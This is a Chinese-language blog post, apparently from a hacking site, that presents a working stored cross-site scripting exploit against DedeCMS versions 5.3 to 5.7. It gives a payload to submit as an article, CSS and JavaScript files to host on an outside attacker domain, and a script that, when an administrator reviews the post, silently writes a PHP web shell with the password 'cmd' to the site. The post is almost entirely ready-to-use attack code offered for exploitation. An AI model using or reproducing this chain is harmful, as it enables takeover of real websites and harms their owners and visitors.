dedecms xss 通杀所有版本 dede 5.6 dede 5.7 直接获取webshell
DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:
- 开启注册
- 开启投稿
注册会员-发表文章投稿,内容如下填写:
<style>@im\port'\http://webshell.cc/xss.css';</style>
在你自己的网站webshell.cc上新建xss.css内容如下:
body{ background-image:url('javascript:document.write("<script src=http://webshell.cc/xss.js></script>")') }
在你自己的网站webshell.cc上新建xss.js 内容如下:
var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType('text/xml'); } } elseif(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions); } catch(e) {} } } xmlhttp=request; function getFolder( url ){ obj = url.split('/') return obj[obj.length-2] } oUrl = top.location.href; u = getFolder(oUrl); add_admin(); function add_admin(){ var url= "/"+u+"/sys_sql_query.php"; var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++"; xmlhttp.open("POST", url, true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.setRequestHeader("Content-length", params.length); xmlhttp.setRequestHeader("Connection", "Keep-Alive"); xmlhttp.send(params); }
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd。
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/2962.html